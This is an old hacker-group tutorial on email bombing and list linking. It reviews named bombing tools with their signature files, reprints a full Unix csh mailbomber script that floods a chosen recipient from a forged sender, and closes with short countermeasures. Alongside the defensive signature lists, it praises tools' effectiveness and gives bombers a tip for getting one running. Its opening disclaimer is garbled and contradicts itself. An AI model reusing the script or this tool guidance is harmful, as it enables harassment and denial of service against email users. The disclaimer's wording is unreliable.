============================= Mail Bombing and List Linking ============================= by Tolda [2000] With comments and additions by R a v e N.

Written for BSRF. Homepage: http://blacksun.box.sk Important Note ============== The writers of this article nor BSRF believe that mail bombing and list linking are against the law, and should not be carried out nor tolerated by anyone. In fact, these are two of the dumbest things you could do on the net, and will only get you mocked. Such attacks are only carried out by kids with too much time in their hands, who are not smart enough to carry out more sophisticated attacks. Know Your Enemy =============== Up Yours: The Up Yours mail-bombing program is probably the most popular bomber out there. It uses minimal resources, does a superb job, has a simple user interface, and attempts to obscure the attacker's source address. Features of the program include being able to specify times of day to start and stop as well as the number of messages with which it will hammer the target. This bomber runs only on the Microsoft Windows platform. If you are a system administrator, you will want to scan your local drives for the following files: upyours.exe upyours2.zip upyours3.zip If these files appear in a user's directory, there is a strong likelihood that he is about to e-mail bomb someone (of course, perhaps he simply spends his time collecting hacking and cracking programs). In any event, the utility is hard to find. If one of your users has acquired this program, he clearly has an interest in hacking or cracking :o) KaBoom: KaBoom differs significantly from Up Yours. In the main program, you find a utility to list link. Using this function, you can subscribe your target to hundreds of e-mail lists. When I say that a target has been list-linked, I mean the target has been subscribed (without his consent) to one or more mailing lists. Such tools submit registration requests on behalf of the victim, forging his e-mail address. In any event, this utility's signature files are these: kaboom!3.zip kaboom3.exe Avalanche: The Avalanche e-mail bombing utility works smoothly and is well

designed. The list groups are displayed in a drop-down combo box, and their individual lists are displayed in a list box. Three clicks of a mouse and your target is in hot water. TIP: The programmer here was a bit absentminded. The program was written at least in part in Microsoft Visual Basic 4.0. As such, there are a series of DLL files that are required to run the application. These are missing from the general distribution of this utility; therefore, serious bombers must go out onto the Internet to retrieve those files (one is OC2.DLL). Because of this, I would estimate that Avalanche is probably used less than its counterparts, even though its overall design is superior. Inconvenience discourages most users of this particular ilk. The signature files for this product are: alanch10.zip avalanche20.zip avalanche.exe Unabomber: The Unabomber utility is a rudimentary tool, but one must give the author credit for humor. Unabomber offers no list-linking capabilities. It is essentially a flat e-mail bomber and does no more than send messages over and over. One interesting element is that Unabomber comes with a help function. The signature files for this utility are: unabomb.zip unabomb.exe eXtreme Mail: eXtreme Mail is well programmed. It includes an interactive installation process that performs all the routine checks for disk space, resources, and so forth. It also observes proper registry conventions and is easily uninstalled. The signature files for this product are: xmailb1.zip xmailb1.exe Homicide: The Homicide utility was written by a youngster with the moniker Frys and was discontinued in 1996. The author claims that he wrote the utility because Up Yours 2.0 was inadequate as an e-mail bombing tool. However, with the release of Up Yours 3.0, Frys apparently decided to discontinue any further releases. As of March 1997, it is available only at a very few select sites. The signature files for this utility are: homicide.zip homicide.exe The UNIX MailBomb: This UNIX e-mail bomber is reportedly written by CyberGoat, an anonymous cracker out in the void. The signature file on this one is mailbomb.csh.

It is in fact a CSH shell script and not a program, since Unix has such powerful shells and shell scripting capabilities. It's main advantage is that it is very small in size. #!/bin/csh # Anonymous Mailbomber # do chmod u+rwx <filename> where filename is the name of the file that # you saved it as. #*** WARNING - THIS WILL CREATE AND DELETE A TEMP FILE CALLED # "teltemp" # IN THE DIRECTORY IT IS RUN FROM **** clear echo -n "What is the name or address of the smtp server ?" set server = $< #echo open $server 25 > teltemp echo quote helo somewhere.com >> teltemp #The entry for the following should be a single name (goober), #not goober@internet.address <mailto:goober@internet.address>. echo -n "Who will this be from (e.g. somebody) ?" set from = $< echo quote mail from: $from >> teltemp echo -n "Who is the lucky recipient (e.g. someone@somewhere) ? " set name = $< echo quote rcpt to: $name >> teltemp echo quote data >> teltemp echo quote . >> teltemp echo quote quit >> teltemp echo quit >> teltemp echo -n "How many times should it be sent ?" set amount = $< set loop_count = 1 while ($loop_count <= $amount) echo "Done $loop_count" ftp -n $server 25 < teltemp @ loop_count++ end rm ./teltemp echo $amount e-mails complete to $name from $from@$server # -------------------# MailBomb by CyBerGoAT Bombtrack: The Bombtrack utility is reportedly the first mail-bombing tool written for the Macintosh platform. It is another run-of-the-mill bombing utility, widely available at cracker sites across the Internet. The signature file for this application is: bombtrack.bin FlameThrower: FlameThrower is a bombing utility written for Macintosh. Its main purpose is list linking; it allows the user to subscribe his target to 100 lists. The binary is quite large, considering its intended purpose. The signature for this file is: flamethrower10b.sit.bin

Mail Bombing Countermeasures ============================ There are many utilities out there (such as pop3free, pop3clean etc') that will clean up POP3 mail accounts. To learn more about POP3, refer to BSRF's POP3 tutorial. As for web-based mail accounts, you can always save any real mails that you got and delete all the rest (any web-based mail account should have such a feature). To report such attacks, send a message to your abuse team (for example: if you have an account at hotmail.com, send your mail to abuse@hotmail.com). As for list linking, if you're facing a large attack and cannot unsubscribe from all of the mailing list by yourself, consider switching to another account. Sorry, there's no other way. Question? Comments? Post them to BSRF's message board at blacksun.box.sk. Thanks for reading!